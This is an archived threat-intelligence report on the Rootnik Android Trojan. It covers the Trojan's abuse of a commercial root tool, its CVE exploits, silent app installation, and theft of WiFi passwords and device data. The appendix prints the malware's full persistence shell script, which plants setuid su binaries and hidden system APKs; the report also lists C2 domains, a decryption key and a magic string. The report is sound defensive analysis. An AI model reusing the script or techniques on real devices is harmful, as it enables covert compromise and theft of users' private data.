{
	"id": "06b2973c-a5ad-4479-a547-431219301775",
	"created_at": "2026-04-06T00:15:12.504722Z",
	"updated_at": "2026-04-10T13:12:29.968667Z",
	"deleted_at": null,
	"sha1_hash": "896b39270db2f174016be811e7d6ccfac8c7f230",
	"title": "Rootnik Android Trojan Abuses Commercial Rooting Tool and Steals Private Information",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1227103,
	"plain_text": "Rootnik Android Trojan Abuses Commercial Rooting Tool and\r\nSteals Private Information\r\nBy Wenjun Hu, Claud Xiao, Zhi Xu\r\nPublished: 2015-12-04 · Archived: 2026-04-05 22:48:08 UTC\r\nWe recently analyzed a Trojan named \"Rootnik\" which uses a customized commercial root tool named “Root\r\nAssistant” to gain root access on Android devices. By reverse engineering and repackaging this tool, the creators\r\nof Rootnik successfully stole at least five exploits that give them root access to Android devices that are running\r\nAndroid 4.3 and earlier. Root Assistant was developed by a Chinese company to help individuals gain root access\r\nto their own devices. However, Rootnik uses this tool to attack phones all over the world. Based on the data we\r\nhave collected, Android users in United States, Malaysia, Thailand, Lebanon and Taiwan have been affected by\r\nthe Trojan thus far.\r\nRootnik was able to spread by being embedded in copies of legitimate applications:\r\nWiFi Analyzer\r\nOpen Camera\r\nInfinite Loop\r\nHD Camera\r\nWindows Solitaire\r\nZUI Locker\r\nFree Internet Austria\r\nSo far, we have observed more than 600 samples of Rootnik in the wild.\r\nAfter a deep analysis of the malware, we determined that it’s able to perform the following actions.\r\nAbuse a customized version of “Root Assistant” to exploit Android vulnerabilities including CVE-2012-\r\n4221, CVE-2013-2596, CVE-2013-2597, CVE-2013-6282.\r\nInstall several APK files on the system partition of the compromised device to maintain persistence after\r\nsuccessful gaining root access.\r\nInstall and uninstall both non-system and system apps without users’ awareness.\r\nDownload executable files from remote servers for local execution.\r\nAggressively promote other applications. The app promotion advertisements are displayed to the user\r\nregardless of the current activity and even pop up in full screen mode when the user is viewing their home\r\nscreen.\r\nSteal WiFi information including passwords and keys as well as SSID and BSSID identifiers.\r\nHarvest victims’ private information including their location, phone MAC address and device ID.\r\nRootnik connects to remote servers using the following domain names.\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 1 of 16\n\napplight[.]mobi\r\njaxfire[.]mobi\r\nsuperflashlight[.]mobi\r\nshenmeapp[.]info\r\nThe earliest creation time of these domains date back to February 2015. At the time of this publication, all of these\r\nremote servers are active. Additional indicators related to this attack are available in the appendix.\r\nHow Rootnik Works\r\nThe Rootnik Malware Workflow\r\nAs shown in Figure 1, Rootnik distributes itself by repackaging and injecting malicious code into legitimate\r\nAndroid apps. After it is installed on an Android device, Rootnik launches a new thread to gain root privileges if\r\ncertain conditions are met. Meanwhile, it begins an “app promotion” procedure that displays advertisements for\r\nother apps to the user. To gain root access, Rootnik first downloads encrypted payloads from a remote server if\r\nthey do not exist locally then proceeds to attempt exploitation of one of four vulnerabilities. After achieving root\r\naccess successfully, the malware writes four APK files to the system partition and reboots the compromised\r\ndevice.\r\nFigure 1: An overview of Rootnik’s workflow\r\nThese four APK files serve as system apps after rebooting, and primarily fall into three categories based on their\r\nfunctionality. Based on the samples we have collected so far the file names of these four APKs are static.\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 2 of 16\n\nAndroidSettings.apk\r\nBluetoothProviders.apk\r\nWifiProviders.apk\r\nVirusSecurityHunter.apk\r\nAndroidSettings.apk is responsible for promoting Android apps and has similar logic to the host malware’s app\r\npromotion procedure. BluetoothProviders.apk and WifiProviders.apk actually perform identical tasks, they act as a\r\nremote control component that can install and uninstall apps as well as download and execute new code from\r\nremote servers.\r\nVirusSecurityHunter.apk is totally a private data-harvesting component, which can steal WiFi information, a\r\nvictim’s location and other potentially sensitive data.\r\nRoot Payload Preparation\r\nIf an infected device is running Android version 4.4 or earlier, and this device isn’t located in certain countries\r\nspecified in the AndroidManifest.xml file, Rootnik will attempt to gain root privileges. Thus far, all samples we\r\nanalyzed were configured to attempt to gain root access in all locations except inside China. This is noteworthy as\r\nthe root utility this malware has co-opted is developed in China.\r\nBefore beginning the rooting process, Rootnik prepares the payloads for execution. It first looks for an asset\r\nnamed “res.bin”, and if this asset does not exist it will access the following remote location:\r\nhttp[:]//api.jaxfire[.]mobi/app/getTabsResBin\r\nThis URL is Base64 encoded in the Rootnik code. The remote server returns a response that is encrypted using\r\nAES/CBC/PKCS5Padding. Decrypting the response results in the following URL:\r\nhttp[:]//cdn.applight[.]mobi/applight/2015/1442824462res.bin\r\nRootnik then downloads this file from the decrypted URL using an HTTP GET request. The res.bin is actually a\r\nZIP archive that is encrypted using DES using the key “#xaj\u0026kl+”. Once decrypted, the following files are\r\nextracted from the archive.\r\nbusybox\r\npsneuter.script_bak\r\ninstall-recovery.sh\r\nsu\r\nrealroot, newrealroot, miroot, onekeyroot\r\nlog_sdk.dex\r\nThe log_sdk.dex is an encrypted DEX file that is decrypted, renamed to a.dex and temporarily stored under the\r\napp’s own data directory. This a.dex file is then dynamically loaded into the app process. The optimization\r\ndirectory for a.dex during dynamic loading is set to a hidden folder named .opt_log, and a.dex file will be finally\r\ndeleted as soon as dynamic loading finishes. This entire process is completed using native code in the library\r\nlibabm.so.\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 3 of 16\n\nAfter investigating the a.dex file, we found it’s actually a customized version of the original commercial root\r\nutility named “Root Assistant,” developed in China.\r\nCustomizing a Commercial Root Utility\r\nThe original “Root Assistant” provides a “one-click root” functionality by exploiting vulnerabilities in the Android\r\nsystem, and “can support the most number of devices with the highest successful rooting rate” according to the\r\nofficial website. “One-key root” means the user can get root access by clicking a single key. The latest version of\r\nthe utility, 1.5.1, uses a commercial packer to protect itself from reverse-engineering. However, we have located\r\nearlier versions of this utility that only used basic obfuscation techniques, which are simple to reverse engineer.\r\nThe earlier version (1.3.0) of this utility follows this basic procedure to again root privileges:\r\n(1). Report Device Specific Information\r\n“Root Assistant” first sends device specific information to its remote server. After receiving this information, the\r\nremote server returns data guiding the selection of proper root exploits. It is important to note that there is no\r\naccess authentication during this network connection.\r\n(2). Prepare Root Exploits\r\nThe root utility stores all of the root exploits in local storage and will choose exploits according to the guidance\r\nfrom its remote server. These root exploits are embedded into four executable files, which are named realroot,\r\nnewrealroot, miroot and onekeyroot. After investigating these executable files, we found that some exploit\r\nmethods come from open source projects including android-rooting-tools , libmsm_acdb_exploit and\r\nlibfj_hdcp_exploit. Table 1 shows some of the vulnerabilities exploited by this root tool.\r\nID Exploit Method CVE ID\r\n1 sock_diag CVE-2012-4221\r\n2 fb_mem CVE-2013-2596\r\n3 msm_acdb CVE-2013-2597\r\n4 put_user CVE-2013-6282\r\n5 fj_hdcp N/A\r\nTable 1: Root exploits used by “Root Assistant”\r\n(3). Apply Exploits\r\nAll four of the files mentioned above are ELF executables and are invoked directly through shell commands. It’s\r\nimportant to note that a magic string is required when running these executables, otherwise they will refuse to\r\nexploit the device. For example, to run the executable onekeyroot, the magic string “www_onekeyrom_com”\r\nshould be provided, as shown in Figure 2. This can be considered a type of self-protection to prevent third parties\r\nfrom co-opting executables for their own use.\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 4 of 16\n\nFigure 2: A magic string is required when executing onekeyroot\r\n(4). Post Process\r\nAfter gaining root access successfully, one of the scripts named psneuter.script or onekeyrootseckill.sh (depending\r\non which file is executed to gain root access) is executed with super user privilege. The main purpose of these\r\nscripts is to install a root privilege management application and to copy a modified “su” file to the system\r\npartition.\r\nAs demonstrated above, “Root Assistant” in version 1.3.0 can be easily reverse-engineered, introducing security\r\nconcerns which are detailed as below:\r\nAs the tool is made up of multiple individual components that each perform a specific tasks without any\r\nuser interaction, they could be easily extracted and re-used by an attack.\r\nNo authentication is required during the network connection between clients and the remote server, which\r\nmeans an attacker who re-uses this code can also re-use the Root Assistant server to help identify the best\r\nexploits for a device.\r\nRoot exploits are stored locally without any protection. Although magic strings are required to run the\r\nrooting executables, this scheme is not effective when the whole app can be reverse-engineered.\r\nThese security holes made it possible for “Root Assistant” to be co-opted by the Rootnik malware. The attacker\r\nrepackaged this root utility to generate a dex file, which is dynamically loaded during the attack to achieve root\r\naccess.\r\nFigure 3 shows the class constructions of this root utility and Rootnik’s a.dex file. Comparing them shows us that\r\nthe primary difference between them is Rootnik’s class android.core.utils.RootUtil. In this class, a thread named\r\nRootAThread is started to launch a root-gaining procedure by invoking the “rooting” entry point in the original\r\nutility.\r\nAs described above, psneuter.script or onekeyrootseckill.sh are executed once root privileges are acquired.\r\nRootnik customized this root utility to always execute psneuter.script and also modified this script file by adding\r\nseveral shell commands to maintain persistent execution on the device. Figure 4 depicts parts of those added shell\r\ncommands, from which we can find that four APK files are written to the /system/app directory. The whole\r\ncontent of psneuter.script is included in the appendix.\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 5 of 16\n\nFigure 3: Class constructions of “Root Assistant” (v1.3.0, left) and a.dex (right)\r\nFigure 4: Shell commands writing APK files to the system partition\r\nEach of these APK files are named to look like system applications. Finally, Rootnik reboots the compromised\r\ndevice and the new APK files are installed as system applications. To avoid being caught by common users, these\r\nfour apps have no icons on a victim’s device after being installed.\r\nApp Promotion\r\nIn addition to gaining root privileges on the device, Rootnik promotes apps to generate revenue for its creator. As\r\ndepicted in Figure 1, the AndroidSettings.apk file, which is installed on the device, has similar app promotion\r\nfunctionality to the host sample. To avoid detection, all those individual parts of the app promotion logic are\r\nimplemented through a delegate that is dynamically loaded from an encrypted JAR file.\r\nInformation about which apps to promote is downloaded from the following URL every 15 minutes.\r\nhttp[:]//cs.applight[.]mobi/c2s\r\nFigure 5 shows the network traffic between a Rootnik sample and the remote server. The information retrieved\r\nfrom the server is stored in a local database named com_av_ad.db as shown in Figure 6. It appears Rootnik\r\nchooses different apps to promote based on the infected device’s geographic location. It’s noteworthy that the\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 6 of 16\n\nlocal database includes a column named pay_out, which appears to list the amount of revenue for each app\r\ninstallation.\r\nFigure 5: Network traffic between Rootnik and the remote server\r\nFigure 6: Promoted apps’ information stored into a local database\r\nRootnik’s app promotion is especially aggressive and annoying to users. Advertisements pop up periodically\r\nregardless of current activity and are even shown in full screen mode. If a victim clicks one of those\r\nadvertisements, Rootnik will launch the Google Play app and show the promoted app’s page (Figure 7).\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 7 of 16\n\nFigure 7: App on Google Play shown when an advertisement is clicked\r\nRemote Control\r\nBluetoothProviders.apk and WifiProviders.apk have identical functionality and serve as a remote controlling\r\ncomponent. Network data transferred between the remote control component and the remote server is encrypted\r\nusing AES/CBC/PKCS5Padding, and the remote servers validate incoming connections by checking values\r\nembedded in the HTTP headers. To increase the robustness of the remote control channel, Rootnik uses two more\r\ndomains to identify the command and control server, api.applight[.]mobi and api.superflashlight[.]mobi, in\r\naddition to the already mentioned api.jaxfire[.]mobi.\r\nThe remote control component is capable of performing multiple malicious functions, including but not limited to\r\nthe following:\r\n(1). Silent Application Installation\r\nWith root privileges, the malware can install both non-system and system apps without alerting the user. As shown\r\nin Figure 8, Rootnik retrieved information about new apps to install from a remote server. After decrypting data\r\nfrom the server we can see that it includes all of the information required to retrieve and install the new app, as\r\ndepicted in Figure 9.\r\nTo install a new app, Rootnik makes an HTTP request to the URL listed in the “parameter” value as shown in\r\nFigure 9, and installs the downloaded result as non-system or system app, based on the value in the “action” field\r\nof the response data. There are two possible “action” values:\r\nlibrary.root.action.install_app_ex: install a non-system app\r\nlibrary.root.action.install_app_system: install a system app\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 8 of 16\n\nRootnik uses the pm utility of the Android system to install non-system apps, while it writes APK files into the\r\n/system/app directory to install system apps as shown in Figure 10. After installing an app successfully, the “shell”\r\nvalue in response data will be executed as a command. For example, the “shell” value shown in Figure 9 will\r\nresult in the new app starting its main activity using “am” utility of the Android system.\r\nFigure 8: Network traffic when fetching information about new apps to install\r\nFigure 9: A section of the decrypted information from the remote server\r\nFigure 10: Command used to install system applications\r\n(2). Silently Uninstall Applications\r\nIn addition to installing apps, the remote control component is also capable of silently uninstalling apps. During\r\nthe app installation procedure described above, an installed app’s package name is stored in a shared preference\r\nfile named uninstall_set.xml. These package names are later used as parameters to uninstall specific apps. Rootnik\r\nexecutes the “pm uninstall” command to uninstall non-system apps, while it invokes the “pm disable” command\r\nand then removes the corresponding APK files from the /system/app directory to uninstall system apps (Figure\r\n11).\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 9 of 16\n\nFigure 11: Command used to uninstall system apps\r\n(3). Download and Execute DEX Files\r\nRootnik was developed to be highly flexible as it can also download and execute dex files from remote servers.\r\nDescriptions of the dex files to be executed is first fetched from remote servers and the resulting data contains\r\ndownload URLs for the dex files as well as the class names that should be invoked within them. After retrieving\r\nthe descriptive information, Rootnik downloads the dex files from the specified URLs and validates their CRC32\r\nvalues. All downloaded dex files are encrypted using DES and their decryption keys are specified in the response\r\ndata. After decrypting the dex files they are dynamically loaded and a method named doInBackground is invoked\r\nas shown in Figure 12.\r\nFigure 12: Executing a dex file downloaded from the remote server\r\nIn addition to the behaviors described above, this remote controlling component also has the ability to self-update,\r\nand upload information about installed applications to the C2 server.\r\nPrivate Data Theft\r\nVirusSecurityHunter.apk, at first glance of its filename, appears to be an antivirus app but in reality has nothing to\r\ndo with antivirus. This component actually harvests WiFi passwords, device location information, the device\r\nMAC address and other private information before sending it to a C2 server using the domain\r\napi.shenmeapp[.]info.\r\nThis component implements a service named mobi.hteam.hunter.ser-vice.HunterService, which is mainly in\r\ncharge of harvesting WiFi information. After investigating this service, we found that WiFi information is\r\ncollected in two different ways. One is to use APIs in the WifiManager class provided by the Android system.\r\nRootnik first invokes the startScan method to scan for WiFi access points, then it extracts BSSID (address of the\r\naccess point), SSID (network name) and encryption scheme data from the scan results and stores them in a local\r\ndatabase.\r\nThe component also parses the contents of the file located at /data/misc/wifi/wpa_supplicant.conf which stores\r\ninformation about all of the WiFi access points that a device has ever connected to. This file is owned by the\r\nsystem user, and can’t normally be read by non-system applications. This is not a problem for Rootnik, as it has\r\nalready gained root privileges at this point in execution. Figure 13 shows some contents of a wpa_supplicant.conf\r\nfile from a Nexus 7 device running Android 4.3. Note that the psk value holds the password used to access the\r\nWiFi network listed. Information including the SSID, BSSID, psk and key_mgmt values are extracted from this\r\nfile and stored into a local database.\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 10 of 16\n\nFigure 13: A part of a wpa_supplicant.conf file on a Nexus 7 device running Android 4.3\r\nAnother service in the information collection component named org.myteam.analyticssdk.AnalyticsIntentService\r\nis responsible for uploading information including the victim’s location, device MAC address, device id to the C2\r\nserver every 24 hours (Figure 14).\r\nFigure 14: Uploading private information\r\nProtection and Prevention\r\nRootnik customizes an earlier version of a commercial root utility named “Root Assistant” from China, and is\r\ncapable of gaining root privileges on devices running Android OS prior to version 4.4. We strongly suggest to\r\nusers who want to mitigate the threat from Rootnik and similar malware to keep their Android devices updated to\r\navoid being vulnerable to known exploits. Users should also avoid installing applications from unknown sources.\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 11 of 16\n\nPalo Alto Networks provide comprehensive protections against Rootnik through our platform. Our WildFire\r\nservice is able to identify samples of this malware family and we have created the Rootnik tag for AutoFocus\r\nusers to identify these files. We have also released DNS signatures to detect and block all malicious network\r\ntraffic related to Rootnik.\r\nAppendix\r\nPsneuter.script Contents\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n#!/system/bin/sh\r\nPKG_NAME=net.boy.threewTeB94\r\nmount -o rw,remount /system\r\n/data/data/$PKG_NAME/files/busybox mount -o rw,remount /system\r\n/system/bin/stop nac_server\r\n/data/data/$PKG_NAME/files/busybox rm -r -f /system/app/Superuser.apk\r\n/data/data/$PKG_NAME/files/busybox rm -r -f /system/xbin/su\r\n/data/data/$PKG_NAME/files/busybox rm -r -f /system/bin/su\r\n/data/data/$PKG_NAME/files/busybox rm -r -f /system/xbin/daemonsu\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/lb.res \u003e\r\n/system/app/BluetoothProviders.apk\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/lw.res \u003e\r\n/system/app/WifiProviders.apk\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/lgs.res \u003e\r\n/system/app/AndroidSettings.apk\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/vsh.res \u003e\r\n/system/app/VirusSecurityHunter.apk\r\n/data/data/$PKG_NAME/files/busybox chmod 0644 /system/app/BluetoothProviders.apk\r\n/data/data/$PKG_NAME/files/busybox chmod 0644 /system/app/WifiProviders.apk\r\n/data/data/$PKG_NAME/files/busybox chmod 0644 /system/app/AndroidSettings.apk\r\n/data/data/$PKG_NAME/files/busybox chmod 0644 /system/app/VirusSecurityHunter.apk\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/su \u003e /system/bin/su\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 12 of 16\n\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/assets/inputbox \u003e\r\n/system/bin/inputbox\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/assets/outputbox \u003e\r\n/system/bin/outputbox\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/bin/inputbox\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/bin/inputbox\r\n/data/data/$PKG_NAME/files/busybox touch -r /system/bin/am /system/bin/inputbox\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/bin/outputbox\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/bin/outputbox\r\n/data/data/$PKG_NAME/files/busybox touch -r /system/bin/am /system/bin/outputbox\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/bin/su\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/bin/su\r\n/data/data/$PKG_NAME/files/busybox cat /system/bin/su \u003e /system/xbin/su\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/xbin/su\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/xbin/su\r\n/data/data/$PKG_NAME/files/busybox cat /system/xbin/su \u003e /system/xbin/daemonsu\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/xbin/daemonsu\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/xbin/daemonsu\r\n/data/data/$PKG_NAME/files/busybox cat /system/xbin/su \u003e /system/xbin/daemonsu\r\n/data/data/$PKG_NAME/files/busybox cat /system/xbin/su \u003e /system/xbin/ku.sud\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/xbin/ku.sud\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/xbin/ku.sud\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/install-recovery.sh \u003e\r\n/system/etc/install-recovery.sh\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/etc/install-recovery.sh\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/etc/install-recovery.sh\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/99SuperSUDaemon \u003e\r\n/system/etc/init.d/99SuperSUDaemon\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 13 of 16\n\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/etc/init.d/99SuperSUDaemon\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/etc/init.d/99SuperSUDaemon\r\n/data/data/$PKG_NAME/files/busybox cat /system/bin/su \u003e /system/bin/.apkolr\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/bin/.apkolr\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/bin/.apkolr\r\nmount -o ro,remount /system\r\n/data/data/$PKG_NAME/files/busybox mount -o ro,remount /system\r\necho \"Now, script finish!\"\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 14 of 16\n\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n81\r\n82\r\n83\r\n84\r\n85\r\n86\r\n87\r\n88\r\n89\r\n90\r\n91\r\n92\r\n93\r\n94\r\n95\r\n96\r\n97\r\n98\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 15 of 16\n\n99\r\nRootnik Samples\r\nPackage Name: com.freeinternet1\r\nSHA256: c1775e5fe89a0c8b1254e4d8a95686c56554b47f13e36d4f5cb551cb340f7021\r\nPackage Name: com.farproc.wifi.analyzer\r\nSHA256: 0d612eb6d3ca2bbbc2aa33493065d8b4c3237f3cb262d48602181887ccea1afb\r\nPackage Name: com.name.costgeoUyI19\r\nSHA256: 17a00e9e8a50a4e2ae0a2a5c88be0769a16c3fc90903dd1cf4f5b0b9b0aa1139\r\nPackage Name: net.three.basicIeVwjf43\r\nSHA256: f6b7b22bbe572c1ac1d7ac7135e076da87491eb78a37f17654a4aa92d88ded24\r\nAdditional APK files written to system partition by Rootnik\r\nPackage Name: com.android.providers.network\r\nSHA256: 3bab02ec7ab2480c65b824350b387b00fc7fd9359ebca34fb42dda340ccbf5b6\r\nPackage Name: com.android.providers.wifi\r\nSHA256: dc76856ff79cfdda7b227635f204ff3341e01ea537022497f5c6a70dc46b0cea\r\nPackage Name: com.yc.aika\r\nSHA256: ae4be03204419fd96c4e5085b6e3ddd542f39c53f9c9d0fed4eecaf823a1b26e\r\nPackage Name: mobi.superflashligh.supertorch\r\nSHA256: 690d44802b3638688c7e93bf9dc85b39fbfa2e03b5763a571caf665c8803b13b\r\nSource: https://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/"
	],
	"report_names": [
		"rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information"
	],
	"threat_actors": [],
	"ts_created_at": 1775434512,
	"ts_updated_at": 1775826749,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/896b39270db2f174016be811e7d6ccfac8c7f230.pdf",
		"text": "https://archive.orkl.eu/896b39270db2f174016be811e7d6ccfac8c7f230.txt",
		"img": "https://archive.orkl.eu/896b39270db2f174016be811e7d6ccfac8c7f230.jpg"
	}
}